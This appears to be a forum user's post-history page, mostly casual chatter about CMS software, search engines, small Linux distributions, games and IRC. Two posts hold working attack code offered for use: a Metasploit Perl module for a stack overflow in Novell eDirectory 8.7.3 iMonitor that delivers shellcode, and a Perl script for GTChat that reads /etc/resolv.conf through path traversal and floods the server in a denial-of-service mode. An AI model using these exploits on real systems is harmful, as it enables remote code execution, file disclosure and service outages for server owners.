machinamedia
-
Content Count
107 -
Joined
-
Last visited
Posts posted by machinamedia
-
-
I preffer to design my site by myself but when it comes about webportals with huge amount of information i preffer using CMS software.Cheers!
-
I think this works... I just restarted firefox and it seems it loads faster and the websites load faster too. Thanks!
-
I adore google. I always found what I was looking for when I used it. Yahoo! is nice too but i don't like the ads!
-
I have 3 computers here:1. amd athlon2. intel celeron3. 2xintel 266 - serverCheers!
-
never heard about that... and i'm not sure that's legal... but... if you will find sumfin please shareMS-DOS? lolz! i think it fits in one diskette a long-time ago. what i'm interested in knowing is how small can one fit a working version of a windows version (w98/2k/me/xp) in a credit card sized CD. heard there is a version of it in win98 running under 50MB. will try to search that sometime.
-
Here's the advisory: http://imp.ovh.net/fr/
package Msf::Exploit::edirectory_imonitor;use strict;use base "Msf::Exploit";use Pex::Text;my $advanced = { };my $info ={'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow','Version' => '$Revision: 1.1 $','Authors' =>['Anonymous',],'Arch' => [ 'x86' ],'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],'Priv' => 1,'AutoOpts' =>{'EXITFUNC' => 'thread'},'UserOpts' =>{'RHOST' => [1, 'ADDR', 'The target address'],'RPORT' => [1, 'PORT', 'The target port', 8008 ],'VHOST' => [0, 'DATA', 'The virtual host name of the server'],'SSL' => [0, 'BOOL', 'Use SSL'],},'Payload' =>{'Space' => 0x1036,'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%",'Keys' => ['+ws2ord'],},'Description' => Pex::Text::Freeform(qq{This module exploits a stack overflow in eDirectory 8.7.3 iMonitorservice.}),'Refs' =>[['BID', 14548],],'Targets' =>[[ 'Windows (all versions) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret],'Keys' => ['imonitor'],};sub new {my $class = shift;my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);return($self);}sub Exploit {my $self = shift;my $target_host = $self->GetVar('RHOST');my $target_port = $self->GetVar('RPORT');my $target_idx = $self->GetVar('TARGET');my $shellcode = $self->GetVar('EncodedPayload')->Payload;my $target = $self->Targets->[$target_idx];$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );my $s = Msf::Socket::Tcp->new('PeerAddr' => $target_host,'PeerPort' => $target_port,'SSL' => $self->GetVar('SSL'),);if ( $s->IsError ) {$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );return;}# pop/pop/ret in ndsimon.dlm on our jump to our shellcodemy $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) ."\xe9\xbd\xef\xff\xff" . ("B" x 0xD0);my $request ="GET /nds/$req HTTP/1.1\r\n"."Accept: */*\r\n"."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"."Host: $target_host:$target_port\r\n"."Connection: Close\r\n"."\r\n";$s->Send($request);$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");select(undef, undef, undef, 4);$self->Handler($s);return;}1;
Have phun!
-
This link doesn't works for me...
-
I would like to mention some other small usable operating systems. Here we go:
FloppyFW (http://www.zelow.no/floppyfw/) - FloppyFW is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.
GeeXboX (http://forums.xisto.com/no_longer_exists/)
MoviX (http://movix.sourceforge.net/) - The MoviX project is a series of three different tiny Linux CD distributions containing all the software to boot from a CD and play multimedia files through the MPlayer, the best multimedia player in the Unix world.
FeatherLinux (http://forums.xisto.com/no_longer_exists/) - Feather Linux is a Linux distribution which runs completely off a CD or a USB pendrive and takes up under 115Mb of space.
Puppy Linux (http://forums.xisto.com/no_longer_exists/) - 60MB
LNX-BBC (http://ww38.lnx-bbc.org/) - The LNX-BBC is a mini Linux-distribution, small enough to fit on a CD-ROM that has been cut, pressed, or molded to the size and shape of a business card.
Trinux (http://code.google.com/p/ubuntutrinux/) - Trinux is a ramdisk-based Linux distribution that boots from a single floppy or CD-ROM, loads it packages from an HTTP/FTP server, a FAT/NTFS/ISO filesystem, or additional floppies.
Cheers!
-
-
I like it. It's really simple and powerfull. Keep up the good work!Cheers!
-
-
Here we go...
#!/usr/bin/perl use LWP::Simple; if (@ARGV < 3){ print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n"; print "sever - URL chat\n"; print "path - path to chat.pl\n"; print "mode - poc or dos,\n"; print " poc - simple check without DoS and exit,\n"; print " dos - DoS, you must set count for requests in 4 argument.\n\n"; exit ();} $DoS = "dos"; $POC = "poc"; $server = $ARGV[0]; $path = $ARGV[1]; $mode = $ARGV[2]; $count = $ARGV[3]; print qq( ################################### # GTChat <= 0.95 Alpha remote DoS # # tested on GTChat 0.95 Alpha # # Šoded by x97Rang 2005 RST/GHC # # Respect: b1f, 1dt.w0lf, ed # ################################### );if ($mode eq $POC){ print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n"; $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); $content = get "$URL";if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/){ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }if ($content =~ /Fatal error/){ print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n"; print "=== OUTPUT ===============================================================================\n"; print "\n$content\n"; print & #34;=============================================================================== OUTPUT ===\n"; exit();}else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep \n"; }}if ($mode eq $DoS){if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() } print "\nSend $count DoS requests to $server...\n"; $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; } print "Done, packets sended.\n";}
Have phun!Notice from cmatcmextra:Please use codebox tags when posting large amounts of codeNotice from Dooga:vizskywalker told me that it should not be visible, because the code teaches how to hack using denial of service exploits, and on a computer that's fast enough, could damage an unprotected server. What do you think?
-
I was sure VISTA is another ridiculos version of windows... If you remember well, the bsod could be seen at win98's launch too... and win98 was totally messed up!
-
I don't like at all this website :/ It loads really hard and the interface it's a really bad copy of http://www.n-sane.net/ which it's awesome!
cheers! -
It's interesting... but I don't like it enough...
-
When I first joined Xisto i've read that if you want the #1 hosting plan (you need 10 hosting credits) after applying and getting your site hosted you don't have to remain active in the forums. However when I login it tells me HOSTING CREDITS : X DAYS.
Can someone please explain me how's the deal...
Sorry.
Thanks!
-
You can try DALnet (/server irc.dal.net). It's really easy to get your channel registered in there. The steps for getting your channel registered are really few:
- register your nickname (/msg nickserv@services.dal.net register <password> <email>)
- confirm your nickname's registration (you'll receive instructions in your mail)
- join the channel which you want to register (you must be op in there)
- register your channel (/msg chanserv@services.dal.net register <channel> <password> <description>)
That's it! Have phun!
-
For Perl :
You can find it at: http://forums.xisto.com/no_longer_exists/Protect your valuable Perl source code from the prying eyes of the casual user! pENC's innovative encryption system allows certain types+ of perl script to be not only encrypted once. but multiple times!
Also you can read more about perl source encryption here: http://forums.xisto.com/no_longer_exists/
For Python
No clue
Cheers!
-
Lyon2 wrote a topic about The Best Free Remote Control Software http://forums.xisto.com/topic/26231-the-best-free-remote-control-software-for-remote-control-of-a-computer/
Cheers!The program allows you to use your mouse and keyboard to control the other PC remotely, like if you were in front of that computor, wich can be very, very usefull for network admins of a small or big network of computers.
UltraVNC features are:
FileTransfer, Video Driver, Encryption Plugins, MS Logon, high performances over all kinds of connections, Viewer Toolbar, JavaViewer with FileTransfer, autoscaling and serverside scaling, Multiple Monitors support, Repeater/proxy support, good Security and Text Chat.
UltraVNC also has this addons: Repeater, SingleClick packager and Nat to Nat connector, that help you to handle complex connection situations.
UltraVNC runs under Windows operating systems (95, 98, Me, NT4, 2000, XP, 2003).
And has many more functions, usefull for any network admin.
Home page:
-
At the moment I play alot quake2, postal2, warcraft3, world of warcraft and mapple story :)Cheers!
-
I would say e107. I used it some time ago for a linux portal and it worked perfectly. I also saw a lot of portals built using phpnuke and they look awesome...cheers!
-
-
I'm absolutely sure that diablo3 will own all rpgs of the moment! I really can't wait untill it will be ready and launched! But I still continue to play diablo2 which also it's really good value. Have phun!Cheers!
-
I think google is for no doubt the best search engine all over the internet. It returns best results and even if you use that "I feel lucky" button you'll find what you're looking for...Also it's really fast! I love google. That's it!
Novell Edirectory Imonitor Remote Buffer Overflow running on port 8008
in Security issues & Exploits
Posted · Report reply
What exactly do you mean?